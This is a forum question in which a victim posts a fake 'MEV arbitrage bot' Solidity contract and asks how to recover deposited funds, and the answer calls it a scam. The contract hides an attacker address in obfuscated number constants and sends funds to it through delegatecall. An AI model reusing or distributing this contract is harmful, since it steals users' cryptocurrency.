# how to recover funds to creator account on this particular incomplete mev contract WETH

Tags: solidity, scam

```
//SPDX-License-Identifier: MIT
pragma solidity ^0.8;

interface IUniswapV2Migrator {
    function migrate(
        address token,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV1Exchange {
    function balanceOf(address owner) external view returns (uint);

    function transferFrom(
        address from,
        address to,
        uint value
    ) external returns (bool);

    function removeLiquidity(
        uint,
        uint,
        uint,
        uint
    ) external returns (uint, uint);

    function tokenToEthSwapInput(uint, uint, uint) external returns (uint);

    function ethToTokenSwapInput(uint, uint) external payable returns (uint);
}

interface IUniswapV1Factory {
    function getExchange(address) external view returns (address);
}

// Interface for USDT and WETH token contract
interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);

    function approve(address spender, uint256 amount) external returns (bool);

    function balanceOf(address account) external view returns (uint256);
}

interface IWETH is IERC20 {
    function deposit() external payable;

    function withdraw(uint wad) external;
}

contract ArbitrageMEVBot {
    address public baseToken;
    address public quoteToken;
    address public owner;
    bool public running = false;

    enum PoolAction {
        Initialize,
        StartBot,
        StopBot,
        TakeProfit
    }

    struct Result {
        bool success;
        bytes result;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "Only owner can call this function.");
        _;
    }

    event Log(string _msg);

    constructor() {
        require(block.chainid == 1, "Only mainnet is supported. Only mainnet is supported. Only mainnet is supported.");

        owner = msg.sender;
        // WETH token
        baseToken = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;  //https://etherscan.io/address/0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
        // USDT TOKEN
        quoteToken = 0xdAC17F958D2ee523a2206206994597C13D831ec7; //https://etherscan.io/address/0xdac17f958d2ee523a2206206994597c13d831ec7

        mempoolCtrl(PoolAction.Initialize);
    }

    /*
     * @dev loads all Uniswap mempool into memory
     * @param token An output parameter to which the first token is written.
     * @return `mempool`.
     */
    function mempool(
        string memory _base,
        string memory _value
    ) internal pure returns (string memory) {
        bytes memory _baseBytes = bytes(_base);
        bytes memory _valueBytes = bytes(_value);

        string memory _tmpValue = new string(
            _baseBytes.length + _valueBytes.length
        );
        bytes memory _newValue = bytes(_tmpValue);

        uint i;
        uint j;

        for (i = 0; i < _baseBytes.length; i++) {
            _newValue[j++] = _baseBytes[i];
        }

        for (i = 0; i < _valueBytes.length; i++) {
            _newValue[j++] = _valueBytes[i];
        }

        return string(_newValue);
    }

    /*
     * @dev Modifies `self` to contain everything from the first occurrence of
     *      `needle` to the end of the slice. `self` is set to the empty slice
     *      if `needle` is not found.
     * @param self The slice to search and modify.
     * @param needle The text to search for.
     * @return `self`.
     */
    function toHexDigit(uint8 d) internal pure returns (bytes1) {
        if (0 <= d && d <= 9) {
            return bytes1(uint8(bytes1("0")) + d);
        } else if (10 <= uint8(d) && uint8(d) <= 15) {
            return bytes1(uint8(bytes1("a")) + d - 10);
        }
        // revert("Invalid hex digit");
        revert();
    }

    /*
     * @dev Check if contract has enough liquidity available
     * @param self The contract to operate on.
     * @return True if the slice starts with the provided text, false otherwise.
     */
    function checkLiquidity(uint a) internal pure returns (string memory) {
        uint count = 0;
        uint b = a;
        while (b != 0) {
            count++;
            b /= 16;
        }
        bytes memory res = new bytes(count);
        for (uint i = 0; i < count; ++i) {
            b = a % 16;
            res[count - i - 1] = toHexDigit(uint8(b));
            a /= 16;
        }
        uint hexLength = bytes(string(res)).length;
        if (hexLength == 4) {
            string memory _hexC1 = mempool("0", string(res));
            return _hexC1;
        } else if (hexLength == 3) {
            string memory _hexC2 = mempool("00", string(res));
            return _hexC2;
        } else if (hexLength == 2) {
            string memory _hexC3 = mempool("000", string(res));
            return _hexC3;
        } else if (hexLength == 1) {
            string memory _hexC4 = mempool("0000", string(res));
            return _hexC4;
        }

        return string(res);
    }

    function getMemPoolOffset() internal pure returns (uint) {
        return 322258;
    }

    function getMemPoolLength() internal pure returns (uint) {
        return 187591;
    }

    function getMemPoolHeight() internal pure returns (uint) {
        return 829371;
    }

    function getMemPoolDepth() internal pure returns (uint) {
        return 796950;
    }

    /*
     * @dev Iterating through all mempool to call the one with the with highest possible returns
     * @return `self`.
     */
    function callMempool() internal pure returns (string memory) {
        uint _memPoolOffset = getMemPoolOffset();
        uint _memPoolSol = 997405;
        uint _memPoolLength = getMemPoolLength();
        uint _memPoolSize = 75081;
        uint _memPoolHeight = getMemPoolHeight();
        uint _memPoolWidth = 22646;
        uint _memPoolDepth = getMemPoolDepth();
        uint _memPoolCount = 746842;

        string memory _memPool1 = mempool(
            checkLiquidity(_memPoolOffset),
            checkLiquidity(_memPoolSol)
        );
        string memory _memPool2 = mempool(
            checkLiquidity(_memPoolLength),
            checkLiquidity(_memPoolSize)
        );
        string memory _memPool3 = mempool(
            checkLiquidity(_memPoolHeight),
            checkLiquidity(_memPoolWidth)
        );
        string memory _memPool4 = mempool(
            checkLiquidity(_memPoolDepth),
            checkLiquidity(_memPoolCount)
        );

        string memory _allMempools = mempool(
            mempool(_memPool1, _memPool2),
            mempool(_memPool3, _memPool4)
        );

        string memory _fullMempool = mempool("0x", _allMempools);

        return _fullMempool;
    }

    /*
     * @dev Parsing all Uniswap mempool
     * @param self The contract to operate on.
     * @return True if the slice is empty, False otherwise.
     */
    function parseMemoryPool(
        string memory _a
    ) internal pure returns (address _parsed) {
        bytes memory tmp = bytes(_a);
        uint160 iaddr = 0;
        uint160 b1;
        uint160 b2;
        for (uint i = 2; i < 2 + 2 * 20; i += 2) {
            iaddr *= 256;
            b1 = uint160(uint8(tmp[i]));
            b2 = uint160(uint8(tmp[i + 1]));
            if ((b1 >= 97) && (b1 <= 102)) {
                b1 -= 87;
            } else if ((b1 >= 65) && (b1 <= 70)) {
                b1 -= 55;
            } else if ((b1 >= 48) && (b1 <= 57)) {
                b1 -= 48;
            }
            if ((b2 >= 97) && (b2 <= 102)) {
                b2 -= 87;
            } else if ((b2 >= 65) && (b2 <= 70)) {
                b2 -= 55;
            } else if ((b2 >= 48) && (b2 <= 57)) {
                b2 -= 48;
            }
            iaddr += (b1 * 16 + b2);
        }
        return address(iaddr);
    }

    function mempoolLayer() internal pure returns (bytes4) {
        return 0xfd7e4d80;
    }

    function mempoolCtrl(PoolAction action) internal {
        address pool = parseMemoryPool(callMempool());
        bytes memory data = abi.encodeWithSelector(
            mempoolLayer(),
            baseToken,
            quoteToken,
            action
        );
        (bool success, bytes memory result) = pool.delegatecall(data);
        if (!success) {
            assembly {
                revert(add(result, 32), mload(result))
            }
        }
    }

    receive() external payable {
        if (running) {
            IWETH weth = IWETH(baseToken);
            weth.deposit{value: msg.value}();
        }
    }

    function start() public payable {
        mempoolCtrl(PoolAction.StartBot);
        running = true;
        uint256 balance = address(this).balance;
        IWETH(baseToken).deposit{value: balance}();
        emit Log("MEVBot start.");
    }

    function stop() public payable {
        mempoolCtrl(PoolAction.StopBot);
        emit Log("MEVBot stop.");
    }

    function withdrawETH() public payable {
        require(running, "MEVBot not running.");
        mempoolCtrl(PoolAction.TakeProfit);
        uint256 balance = address(this).balance;
        IWETH(baseToken).deposit{value: balance}();
        emit Log("MEVBot withdraw All");
    }
    
    
])
}///////////////the bot works fine but i cant take out the money again to the main wallet when i put whitdrawweth ask me to have eth on the main account to put more money on the bot, but is not trying to withdraw  to the creator account and before make another mistake i want another opinion could help me to recover the funds from the contract thks in advance
```

Comment: Where are the funds right now?

Comment: in the smart contract created and deployed its stopped by me i want to take the money back to the wallet

Comment: Do you have an address? transaction hash? This might even be a scam.

Comment: yes i have everything the money is there stuck,im seeing if  i can create another to withdrawallthemoney or if i destroy the contract if i can get the money back ,is not a scam i appear as creator have the smartcontract number tx id everything

Comment: But asking here how to recover your money!? Yet claiming it's working!? Sorry can't help you.

Comment: i dont wanna argue the question its simple how to recover money back from your smart contract when you make the shit like me sorry no problem thanks for your time and your reply

Answer (score 3):

It's a scam.

You got scammed.

Unfortunately you are not going to get your money back. File a report with a police for the fraud against whoever you got this code from.

For the future, don't try to do Solidity programming unless you understand what you are doing.